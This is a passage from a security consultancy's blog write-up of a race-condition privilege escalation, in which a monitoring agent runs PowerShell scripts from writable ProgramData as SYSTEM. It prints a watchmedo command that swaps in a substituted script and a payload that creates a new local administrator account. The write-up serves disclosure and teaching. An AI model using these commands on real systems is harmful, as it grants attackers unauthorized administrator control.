As we see the PowerShell scripts are being written to the ProgramData directory in Windows. This is a very common place for applications to store files they need for their operation because it does not require elevated rights so running the application in user space still allows interaction with log or configuration files etc. that are stored there. Because of this by default ALL authenticated users can write to subdirectories of ProgramData.
watchmedo shell-command –patterns=”*.ps1” –recursive –command=’copy {path to your powershell}.ps1 ${watch_src_path}’ C:\ProgramData\{agent directory}
The command above instructs watchmedo to monitor for files created with the .ps1 extension, and then copy a file we specify into the path that the watchdog triggered on seeing a .ps1 file created. This allowed us to monitor and replace the PowerShell scripts even though we could not predict their directory name or file name.
For our replacement PowerShell script we used a very simple proof of concept to show that the agent executed our script as system successfully. We leveraged this flaw to escalate privileges by adding a new user as a local administrator to the target.
net user /add raceCondition
net localgroup Administrators raceCondition /add
echo “race won” >> {path to your desktop} raceCondition.txt
This simple setup was very noisy when attempting to trigger and thus could be refined greatly, but it got the job done. While running we saw the result of our copy shell command running each time there was a change in the directories we were monitoring.
From here we simply watch the desktop for the creation of our text file letting us know that the race condition has executed successfully, and then we can confirm our user was also created as we see here:
Are you looking for a security assessment for your network or applications? Send us an email at info@mccormackcyber.com